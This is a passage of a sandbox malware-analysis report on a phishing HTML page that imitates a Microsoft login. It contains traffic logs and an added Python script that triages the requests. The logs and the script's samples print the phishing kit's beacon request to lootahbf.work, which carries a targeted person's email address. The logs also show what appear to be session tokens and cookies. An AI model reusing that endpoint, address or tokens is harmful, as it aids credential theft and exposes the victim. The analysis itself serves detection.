  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225258Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=28ab033466cc44188ab2f1189793a356&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-338389&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: dI8PgNjo+ke0xboL.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225302Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=cec3223855544d519fc2c34693672524&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513697&metered=false&nettype=ethernet&npid=sc-280815&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513697&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: dI8PgNjo+ke0xboL.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWP0UC?ver=2f44 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: img-prod-cms-rt-microsoft-com.akamaized.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWEJpy?ver=6047 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: img-prod-cms-rt-microsoft-com.akamaized.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWEtem?ver=77f0 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: img-prod-cms-rt-microsoft-com.akamaized.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWP8kk?ver=8c62 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: img-prod-cms-rt-microsoft-com.akamaized.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWyRpm?ver=4e05 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: img-prod-cms-rt-microsoft-com.akamaized.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cms/api/am/imageFileData/RWyTNu?ver=6011 HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate, br
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
  Host: img-prod-cms-rt-microsoft-com.akamaized.net
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225342Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=dc9b39fc0d0148e1b1e02d04ebe466b4&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513699&metered=false&nettype=ethernet&npid=sc-310091&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513699&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=[removed]&p=
  Cache-Control: no-cache
  MS-CV: YQVwk7f/Y06mdShO.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20220513T225401Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b69f9e6792c34f1c91801a094f11b7c2&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1513699&metered=false&nettype=ethernet&npid=sc-310091&oemName=ikwsgr%2C%20Inc.&oemid=ikwsgr%2C%20Inc.&ossku=Professional&rver=2&smBiosDm=ikwsgr7%2C1&tl=2&tsu=1513699&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing= HTTP/1.1
  Accept-Encoding: gzip, deflate
  X-SDK-CACHE: pod=3&chs=0&imp=0&chf=0&ds=50583&fs=32099&sc=6
  X-SDK-HW-TOKEN: t=EwDYAppeBAAUlAKXDAofTQM+n+MaRVFKzH/ehWgAAZsOXuX/JbjhRGMq3loS0ogrfyhYq6q0ZMd80uaPg9g1fMvc9C9jQzFlGWq9HwGwJBQK5BWLtHUQKXrGS5B0NqmLrhIdkfIAyIfQWBq1vHQHqULKfOllF5lBfPLDkEtzWcFAcU6QtrSOotUbBDpWkmDggwXBfqIgAtfoMbUwVkvsd6MLDG5zPIFqK6CnVOWJYKVIjKSths1SzIS/GOkbsai6FlaN11R03Wluj6o5vdNDnO0c14pQtytyVhEIkyi+kh6gZZT4CN3HR7iNz3AgcsleRJjtdYMx+0AyQQ56iLilxEYEW7xNVy/Jdg/jYBGTwiXcwWA2R3tO7v/TDXnezsEDZgAACINg9LzuZshEqAHLqJUo6jsZmtkxMMWPLR6heRdeFE5Co4ySS36RJGxKbJ3Wi5ig1vDLi+maFOVM8xZwps8jmH6T2VU/ARj6OquUk3Ff9Y/XQ5hhXix0IIsfA7pLstoXZSnmkG+N7aQwYrs925M+3KmyqnS5r3S+HQgRODPk1pvTQewXZCJxVp0oiI7TDuF0mg6nTsnAorXuusZgWOhxY/Sl6RyNAorpeAzlW/4Yd6qNugv2mdC9AxaVlBMUPH2FMJS3hC7CALYfkP2SIeLjpovtS4NJZZ7SxFdXsncITiyumVEYLat2ZALlgIS/BaULfn19tGJ0/UAQ7pX55yG7RglPGvAh+LJl8Eq8YT4d0U9czfLbd71RZhJzdIAdra+YJI5HAGuKFWT/0/eAq1r5dKq9sfVekf5hJ6YnQYzfKQLIMI18Yh0UYdQLVf9N4T9vaH7TsvVtdzMFsr0rzlI51nhzs1G+tchs9q5CtkWVs+TF7xwAICU5USdDzCjRO+M6yjsTKCEGXeI/R48cKVX1UMxISTmOsRBBITG7E84cBhnLhg4+0+48Ib13/ltkKmHjlFC11QE=&p=
  Cache-Control: no-cache
  MS-CV: YQVwk7f/Y06mdShO.0
  User-Agent: WindowsShellClient/9.0.40929.0 (Windows)
  X-SDK-HWF: tch0,m301,m751,mA01,mT01
  Host: arc.msn.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Fri, 13 May 2022 13:50:55 GMT
  Server: Apache
  Connection: close
  Transfer-Encoding: chunked
  Content-Type: text/html; charset=UTF-8
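The traffic block above mixes three kinds of request. The fetches from aadcdn.msftauth.net and aadcdn.msauth.net are the genuine Microsoft sign-in artwork (the logo SVG hash ee5c8d9fb6248c938fd0dc19370e90bd is the one the brand-similarity matcher flagged), pulled in by the local HTML file so it renders like a real login page. The clients2.google.com, store-images.s-microsoft.com, arc.msn.com, fs.microsoft.com and akamaized.net requests are the sandbox's own Chrome and Windows background traffic. The one request that belongs to the phishing kit is the cross-origin fetch to lootahbf.work, whose path carries the targeted mailbox bsalazar@redriverbank.net and which is sent with Origin: null, i.e. from an opaque origin, consistent with the page having been opened from file:///. The report does not pair requests with responses, so whether the Apache 404 at the end of the block answers that request is an inference. As an added example, not part of the sandbox report, the following Python recovers request line and headers from these flattened lines (splitting on a fixed list of header names, since the separators were lost) and applies that triage. The three sample lines are copied from the block above; the allowlist of expected sandbox hosts is an assumption made for this example.

```python
"""Recover and triage flattened 'HTTP traffic detected' lines from a sandbox report."""
import re
from dataclasses import dataclass, field

# Header names that occur in the flattened lines. The extraction dropped the
# line breaks between headers, so the names themselves are the only separators.
_HEADER_NAMES = (
    "Host", "Connection", "User-Agent", "Accept-Encoding", "Accept-Language",
    "Accept", "Origin", "Referer", "Cache-Control", "If-Modified-Since",
    "If-None-Match", "Sec-Fetch-Site", "Sec-Fetch-Mode", "Sec-Fetch-Dest",
    "X-Goog-Update-Interactivity", "X-Goog-Update-AppId", "X-Goog-Update-Updater",
)
_SPLIT = re.compile(r"(?=(?:" + "|".join(re.escape(h) for h in _HEADER_NAMES) + r"): )")
_REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
_PREFIX = "HTTP traffic detected: "

# Assumed allowlist for this sandbox: hosts the VM reaches on its own
# (Microsoft sign-in CDNs, Chrome extension updater, Windows shell telemetry).
# A real triage takes this from an environment baseline, not a literal.
KNOWN_INFRA = {
    "aadcdn.msftauth.net", "aadcdn.msauth.net", "clients2.google.com",
    "store-images.s-microsoft.com", "arc.msn.com", "fs.microsoft.com",
    "img-prod-cms-rt-microsoft-com.akamaized.net", "www.bing.com",
}
# Hosts serving the real Microsoft sign-in artwork; a page that loads these
# without being served by Microsoft is borrowing the brand.
BRAND_ASSET_HOSTS = {"aadcdn.msftauth.net", "aadcdn.msauth.net"}

# Constructed sample input: three lines copied verbatim from the report block.
SAMPLE_LINES = [
    "Source: global traffic HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9",
    "Source: global traffic HTTP traffic detected: GET /prv.phpbsalazar@redriverbank.net HTTP/1.1Host: lootahbf.workConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9",
    "Source: global traffic HTTP traffic detected: GET /image/apps.39478.14495311847124170.e89a4dce-fd9a-4a10-b8e4-a6c3aa1c055e.8ad1b690-ff36-44fa-8afc-0dc5bed1273c?format=source HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: store-images.s-microsoft.comConnection: Keep-Alive",
]


@dataclass
class Request:
    method: str
    target: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self):
        return self.headers.get("Host", "")


def parse_flattened(line):
    """Split one flattened report line back into request line and headers."""
    body = line.split(_PREFIX, 1)[1] if _PREFIX in line else line
    parts = _SPLIT.split(body)
    m = _REQUEST_LINE.match(parts[0].strip())
    if m is None:
        raise ValueError(f"no request line at start of {parts[0][:60]!r}")
    req = Request(m.group("method"), m.group("target"))
    for part in parts[1:]:
        name, _, value = part.partition(": ")
        req.headers[name] = value.strip()
    return req


def triage(req):
    """Findings for one request; an empty list means nothing stood out."""
    findings = []
    if req.host not in KNOWN_INFRA:
        findings.append(f"unknown host {req.host}")
    if _EMAIL.search(req.target):
        findings.append("email address in request target")
    if req.headers.get("Origin") == "null" and req.headers.get("Sec-Fetch-Mode") == "cors":
        # Chrome sends Origin: null for an opaque origin, e.g. a page opened
        # from file://, which is how this sample was detonated.
        findings.append("cross-origin fetch from an opaque origin (Origin: null)")
    if req.host in BRAND_ASSET_HOSTS:
        findings.append("Microsoft sign-in UI asset")
    return findings


def triage_report(lines):
    """Parse and triage every line, preserving input order."""
    return [
        {"host": r.host, "target": r.target, "findings": triage(r)}
        for r in map(parse_flattened, lines)
    ]


if __name__ == "__main__":
    for entry in triage_report(SAMPLE_LINES):
        mark = "!!" if entry["findings"] else "  "
        print(mark, entry["host"], entry["target"][:50], "; ".join(entry["findings"]))
```

The split is only as good as the header list: a header name missing from _HEADER_NAMES stays glued to the previous value, and a value that itself contains a string like "Host: " would be split in the wrong place, so extend the list from the report you are reading rather than trusting it blindly. The request target is kept verbatim; the report shows no separator between prv.php and the address, so the example does not guess one.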
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr String found in binary or memory: https://accounts.google.com/MergeSession
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://apis.google.com
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json.0.dr String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://clients2.googleusercontent.com
Source: 1ab063b0-0b11-4bdb-b1d1-979be8ed357e.tmp.1.dr, be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, efd2cc8f-d662-4a18-8425-a1c45d4ccfa2.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://dns.google
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://fonts.googleapis.com
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://fonts.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://r2---sn-1gi7znes.gvt1.com
Source: 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: be6c1d17-8e7c-4d6f-9ca4-72d4c0fb4f09.tmp.1.dr, 294193eb-34f0-46ca-bce8-0f9b73156572.tmp.1.dr String found in binary or memory: https://www.gstatic.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -480X-BM-FirstEnabledTime: 132061340710069592X-DeviceID: 0100748C0900F045X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; StandardBias=0; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAdtELABKVRi0uEZqpkvZbEYkgCvJB4SlUfBnFRmD2KbN3pYTZ28SZF3VNMC3H20cdPTEy2p%2BLxiokgGMXunV8kWIXJeaxZdAzzuLUHW9j7/E01vJTqZufRse9f0y0F2saK3S9AHyXdqq378ixTPKVxSNJGlzn785FXCK6mRKuw7k5bxtdBrCsDUE99ZyvTyb59kNDAmtTgDhxY6EFFNUrpcHigwXFU0swLaZ3p8Ur9sRSgk6V6vnhVp%2BuOSTpcLTmggVSafY8OW%2BUAy8JE1vXokpbovFsfOOvRC0mZQsNhIPLtX861igqUCu69prtGW1qPN6UT/Ie/sT4sJE5hoUEEIDZgAACH3hEDfIurMMqAFNBoRMccrdW4NegFr%2BjoQfwEgjauLdrInkR0E5mNwDLJJ4KrYiCzYHUs4vN3WDqcNDfi0ul0h0%2BVN5jMZGPZkNw1r76tQoVw76zdWNOlrCwJavDq/cb7v7hsC3p6zp2MJqFZmYjbFX5ArphKpkV19yct%2B9VDzq65T/69JvN2lwXDTpMcppJUerEIAncVj2Qd3tUof1IggbI6nCdCVtQdw%2BwwHgATyUH1V3AahlQW5kH1V/II6GXqnYGlLCmjaLoJmw7mjSFeL2LFy3kVLqEahtNEbpQypCxV4jgjkNj5zOI76CKXiz41iXZOSrb7nsMouncSMeWksuh46eWHQnc00dBa5XYuD465TvBLvilWYUtETg5XSqlNpD7VkYVtboZWTW1crzmJqlEcSvdp4Qt2tWKUFs1ymqjWhBwSOnkMtPNjh64YfB%2BVNUwSGgta/0z5oJH1MUIJgsdlVPpDkXfP0HcyZrCIK6/dZ/%2BlXIsSV6SLjCfsHYFEGJa6IljmOmuAR9gQtSRkl7rP/3uarCsqJOCuY0ZSf1l4G3q/3U%2Bf3rB7IxbJ1ViRQy1AE%3D%26p%3DX-Agent-DeviceId: 0100748C0900F045X-BM-CBT: 1646756872X-Device-isOptin: trueX-Device-Touch: 
falseX-Device-ClientSession: 56B0FB09C5A844A3BFAD59583E571607X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 85683Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=0BA1234E3B2140EBA8746E9F98F8CAA3; _SS=CPID=1652482231077&AC=1&CPH=4ef661f2
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.11.233.143:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.211.6.115:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49772 version: TLS 1.2
Source: unknown HTTPS traffic detected: 152.199.23.37:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.35.236.56:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.135:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.31.64:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49840 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.40.129.122:443 -> 192.168.2.5:49841 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.5:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 80.67.82.235:443 -> 192.168.2.5:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.5:49860 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.5:49862 version: TLS 1.2

System Summary

Source: file:///C:/Users/user/Desktop/bsalazarSecuremail%23Redriverbank2602VY8-FOAT7J-SNN6eYn999.html Tab title: Sign in to your account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\5aba1b91-3f29-4a1d-be20-5481c4ffda6f.tmp
Source: classification engine Classification label: mal56.phis.winHTML@26/116@6/11
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\bsalazarSecuremail#Redriverbank2602VY8-FOAT7J-SNN6eYn999.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1564,2893178873461922982,2517917473115045809,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1556 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
